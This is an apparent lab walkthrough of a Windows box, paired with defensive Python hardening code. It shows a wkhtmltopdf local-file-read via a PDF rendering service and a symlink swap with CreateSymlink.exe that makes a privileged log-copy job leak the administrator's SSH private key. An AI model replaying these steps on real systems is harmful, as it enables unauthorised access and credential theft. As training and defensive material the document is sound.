$ nmap -p- --min-rate 4000 192.168.202.177
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 20:55 +08
Nmap scan report for 192.168.202.177
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
SSH was open on this machine, which was unusual for Windows.
WebPage to PDF -> LFI
Port 80 was rather simple:
I created an HTML file containing a single word, hosted it on my HTTP server, and submitted the URL pointing at my IP. This returned a PDF:
I downloaded the PDF and used exiftool on it to enumerate any version:
$ exiftool ac354a9d4d469ef971709095540b2f42.pdf
ExifTool Version Number : 12.57
File Name : ac354a9d4d469ef971709095540b2f42.pdf
Directory : .
File Size : 6.6 kB
File Modification Date/Time : 2023:07:06 21:03:17+08:00
File Access Date/Time : 2023:07:06 21:03:17+08:00
File Inode Change Date/Time : 2023:07:06 21:03:25+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Title :
Creator : wkhtmltopdf 0.12.3
Producer : Qt 4.8.7
Create Date : 2023:07:06 06:02:52-07:00
Page Count : 1
Googling for exploits against this version shows that LFI is a possibility:
The exploit here is the content of the HTML file being used. Here's my PoC:
Now, we just need to find the correct file to read. The website gives us a username p4yl0ad, and SSH is open, so let's try to read the user's private key.
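The defensive counterpart to the LFI above, added here as an example (it is not code from this write-up or from the wkhtmltopdf project): a small wrapper for a "web page to PDF" service that passes wkhtmltopdf's real `--disable-local-file-access` switch, validates the submitted URL scheme, and flags a PDF whose Creator metadata (as printed by exiftool) names a wkhtmltopdf older than 0.12.6, the release that turned local file access off by default. Note that scheme validation on its own does not stop this attack, because the `file://` reference lives inside the HTML fetched from the remote server; the switch is what actually closes the read. The `render()` helper and its timeout are assumptions about how such a service would shell out.

```python
"""Hardening a 'web page to PDF' service against wkhtmltopdf local file reads.

Added example, not the write-up's or the project's own code.
"""
import re
import subprocess
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# wkhtmltopdf 0.12.6 switched local file access off by default; anything
# older needs --disable-local-file-access passed explicitly.
SAFE_DEFAULT_VERSION = (0, 12, 6)


def validate_url(url: str) -> str:
    """Accept only http(s) URLs with a host; reject file:// and other local schemes."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError(f"refusing to render non-http URL: {url!r}")
    return url


def build_command(url: str, out_path: str) -> List[str]:
    """argv for a hardened render: validated URL, local file access disabled,
    and an argument list (no shell) so the URL cannot inject extra flags."""
    return [
        "wkhtmltopdf",
        "--disable-local-file-access",  # blocks <iframe src="file:///..."> and friends
        "--quiet",
        validate_url(url),
        out_path,
    ]


def render(url: str, out_path: str, timeout: int = 30) -> None:
    """Assumed service entry point: run the hardened command with a timeout."""
    subprocess.run(build_command(url, out_path), check=True, timeout=timeout)


_CREATOR_RE = re.compile(r"Creator\s*:\s*wkhtmltopdf\s+(\d+)\.(\d+)\.(\d+)")


def wkhtmltopdf_version_from_exif(exif_output: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) from exiftool's 'Creator' line, or None."""
    m = _CREATOR_RE.search(exif_output)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def allows_local_files_by_default(exif_output: str) -> bool:
    """True when the Creator names a wkhtmltopdf older than 0.12.6."""
    version = wkhtmltopdf_version_from_exif(exif_output)
    return version is not None and version < SAFE_DEFAULT_VERSION


# The two metadata lines copied from the write-up's exiftool output.
SAMPLE_EXIF = "Creator : wkhtmltopdf 0.12.3\nProducer : Qt 4.8.7\n"

if __name__ == "__main__":
    print("local file access on by default:", allows_local_files_by_default(SAMPLE_EXIF))
    print(build_command("http://10.0.0.5/page.html", "out.pdf"))
```

Running the module prints `True` for the sample metadata and the hardened argv; `build_command()` raises `ValueError` for anything that is not an http(s) URL.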
We also have write access to C:\xampp\htdocs\logs\request.log, so we can replace it with a symbolic link and make the script read and copy any file we want. Again, since SSH is open, we can attempt to get the admin's private key.
First we need to delete the logs directory:
p4yl0ad@SYMBOLIC C:\xampp\htdocs>del logs
C:\xampp\htdocs\logs\*, Are you sure (Y/N)? y
We cannot create a symbolic link to the private SSH key using conventional means because we don't have the required access:
p4yl0ad@SYMBOLIC C:\xampp\htdocs\logs>dir
Volume in drive C has no label.
Volume Serial Number is 5C30-DCD7
Directory of C:\xampp\htdocs\logs
07/06/2023 06:22 AM <DIR> .
07/06/2023 06:22 AM <DIR> ..
07/06/2023 06:22 AM <JUNCTION> request.log [C:\Users\Administrator\.ssh\id_rsa]
The junction above won't work, though. What did work was CreateSymlink.exe from this repo:
We can download that binary, upload it to the target, and run it:
p4yl0ad@SYMBOLIC C:\Windows\Tasks>.\CreateSymlink.exe "C:\xampp\htdocs\logs\request.log" "C:\users\administrator\.ssh\id_rsa"
Opened Link \RPC Control\request.log -> \??\C:\users\administrator\.ssh\id_rsa: 00000174
Press ENTER to exit and delete the symlink
I waited for a while and then deleted the symlink. When we check C:\backup\logs, the newest file is significantly larger than the rest, and it contains the SSH key:
Then, use this key to ssh in as the administrator:
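The privileged copy job is what turned a writable log file into an arbitrary file read. As an added example (not the machine's backup script, whose source this write-up does not show), here is how such a job can refuse the swap: it inspects each source entry with `lstat` rather than following it, rejects symbolic links and Windows reparse points (junctions and symlinks both carry `FILE_ATTRIBUTE_REPARSE_POINT`), refuses anything that resolves outside the log directory, and opens the source with `O_NOFOLLOW` where the platform offers it so the check and the open cannot be raced apart. The `demo()` scenario, the file names and the placeholder "secret" are constructed for illustration; the demo creates a symlink, so it runs as written on a POSIX host, while the reparse-point check only has an effect on Windows.

```python
"""Hardening a privileged 'copy the logs' job against symlink/junction swaps.

Added example; not the backup script from the box.
"""
import os
import shutil
import stat
import tempfile
from typing import Dict

# Windows-only attribute flag; elsewhere it is absent and the test is a no-op.
REPARSE_POINT = getattr(stat, "FILE_ATTRIBUTE_REPARSE_POINT", 0)


class UnsafeSourceError(Exception):
    """Raised when a source entry must not be copied by a privileged job."""


def check_source(path: str, root: str) -> None:
    """Reject links, reparse points, non-regular files and escapes from root."""
    st = os.lstat(path)  # lstat: describe the entry itself, not its target
    if stat.S_ISLNK(st.st_mode):
        raise UnsafeSourceError(f"{path} is a symbolic link")
    if getattr(st, "st_file_attributes", 0) & REPARSE_POINT:
        raise UnsafeSourceError(f"{path} is a reparse point (junction/symlink)")
    if not stat.S_ISREG(st.st_mode):
        raise UnsafeSourceError(f"{path} is not a regular file")
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    if os.path.commonpath([real_path, real_root]) != real_root:
        raise UnsafeSourceError(f"{path} resolves outside {root}")


def safe_copy(src: str, dst_dir: str, root: str) -> str:
    """Copy one checked file into dst_dir and return the destination path."""
    check_source(src, root)
    # O_NOFOLLOW makes the open itself fail if the entry became a link after
    # the check above (closes the check-then-open race on POSIX hosts).
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(src, flags)
    dst = os.path.join(dst_dir, os.path.basename(src))
    with os.fdopen(fd, "rb") as fin, open(dst, "wb") as fout:
        shutil.copyfileobj(fin, fout)
    return dst


def backup_logs(log_dir: str, backup_dir: str) -> Dict[str, str]:
    """Copy every safe entry; return {name: 'copied' or 'skipped: <reason>'}."""
    results: Dict[str, str] = {}
    os.makedirs(backup_dir, exist_ok=True)
    for name in sorted(os.listdir(log_dir)):
        src = os.path.join(log_dir, name)
        try:
            safe_copy(src, backup_dir, log_dir)
            results[name] = "copied"
        except UnsafeSourceError as exc:
            results[name] = f"skipped: {exc}"
    return results


def demo() -> Dict[str, str]:
    """Constructed scenario: a genuine log beside a link pointing at a secret."""
    base = tempfile.mkdtemp()
    logs = os.path.join(base, "logs")
    os.mkdir(logs)
    secret = os.path.join(base, "secret_placeholder")  # stands in for a key file
    with open(secret, "w") as f:
        f.write("PLACEHOLDER SECRET, NOT A REAL KEY\n")
    with open(os.path.join(logs, "access.log"), "w") as f:
        f.write("GET / 200\n")
    # The swap from the write-up: a log name that is really a link elsewhere.
    os.symlink(secret, os.path.join(logs, "request.log"))
    return backup_logs(logs, os.path.join(base, "backup"))


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

In the demo, `access.log` is copied and `request.log` is skipped with the reason recorded, which is also the line a defender wants to see in the job's own log. The destination directory should likewise be one that only the job can write to, otherwise the same trick can be played on the write side.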